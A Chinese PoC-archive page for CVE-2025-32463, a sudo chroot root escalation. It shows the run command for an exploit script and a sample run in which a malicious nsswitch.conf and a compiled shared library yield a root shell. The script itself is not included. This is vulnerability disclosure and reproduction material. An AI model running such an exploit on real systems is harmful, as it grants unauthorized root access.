POC详情: 712605f36f02981c5bceb7fabfe4af18ab345a60

来源
关联漏洞
标题: Sudo 安全漏洞 (CVE-2025-32463)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
介绍
# CVE-2025-32463_Exploit

受危害版本 1.9.14 to 1.9.17

```shell
bash run.sh
```
成功如下

```shell
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh 
[+] CVE-2025-32463 Sudo chroot 漏洞复现脚本
[*] 正在创建临时工作目录...
[*] 工作目录已创建: /tmp/sudo_exploit.nc0EjT
[*] 正在创建 C 语言 payload (woot1337.c)...
[*] 正在设置 chroot 环境和恶意的 nsswitch.conf...
[*] 正在将 payload 编译为共享库 (libnss_/woot1337.so.2)...
[*] 编译成功!
[+] root shell!!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) 组=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit
```
文件快照

[4.0K] /data/pocs/712605f36f02981c5bceb7fabfe4af18ab345a60 ├── [ 729] README.md └── [1.4K] run.sh 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。